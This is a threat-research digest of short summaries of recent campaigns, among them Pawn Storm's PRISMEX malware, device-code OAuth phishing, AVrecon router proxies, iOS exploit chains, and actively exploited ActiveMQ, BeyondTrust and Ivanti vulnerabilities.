Threat Research

Pawn Storm, a Russia-aligned APT group, is targeting Ukraine’s defense supply chain and allied nations. It deploys PRISMEX, a modular malware suite using steganography, COM hijacking, and cloud-based C2. The group exploited multiple flaws, including a Windows zero-day (CVE-2026-21513). Malicious .lnk files via CVE-2026-21509 may chain with CVE-2026-21513, per Akamai findings....

An active phishing campaign is impersonating a cloud file storage service and major e-signature platforms. Instead of stealing passwords, it exploits Microsoft’s legitimate Device Code OAuth flow. Victims are tricked into entering a verification code on Microsoft’s real login page. The attacker intercepts OAuth tokens, gaining persistent access to accounts and data....

AVrecon malware has been used to compromise routers and IoT devices across more than 160 countries, enabling threat actors to convert infected systems into residential proxies. These compromised devices were sold through the SocksEscort service, which facilitated access to hundreds of thousands of infected endpoints since 2020....

Researchers are tracking ongoing Contagious Interview campaign activity by NICKEL ALLEY, a North Korea–linked threat group. The group targets tech professionals using fake job postings and deceptive interview processes. Victims are tricked into downloading malware during these staged recruitment steps....

DarkSword is a sophisticated iOS full-chain exploit leveraging multiple zero-day vulnerabilities to fully compromise devices running iOS 18.4 to 18.7. Since late 2025, it has been used by commercial surveillance vendors and state-sponsored actors across campaigns targeting regions including Saudi Arabia, Turkey, Malaysia, and Ukraine....

The Coruna exploit kit is a sophisticated toolkit targeting Apple iPhones running iOS 13.0 through 17.2.1, containing five full exploit chains and 23 exploits, including zero-day exploits, that leverage advanced, non-public techniques to bypass iOS security protections....

The intrusion started in mid-February 2024 when a threat actor exploited CVE-2023-46604 on an exposed Apache ActiveMQ server. By leveraging a Java Spring class and a custom Spring bean XML configuration, the attacker achieved remote code execution. The malicious XML executed a command that used Windows CertUtil to download a payload from a remote server....

Labs have uncovered targeted phishing campaigns in Taiwan that exploit local business workflows. The attacks deliver Winos 4.0 (ValleyRat) and additional malicious plugins through weaponized attachments and embedded links. Lures impersonate official communications, including tax audit notices, tax software installers, and cloud e-invoice downloads....

VShell and SparkRAT Observed in Exploitation of BeyondTrust Critical Vulnerability (CVE-2026-1731) details active exploitation of a pre-authentication RCE flaw in BeyondTrust Remote Support software that enables attackers to execute OS-level commands and fully compromise affected systems....

Two critical zero-day vulnerabilities, CVE-2026-1281 and CVE-2026-1340, are impacting Ivanti Endpoint Manager Mobile (EPMM). They are actively exploited in the wild, targeting enterprise mobile fleets and corporate networks. The flaws allow unauthenticated remote code execution on affected servers....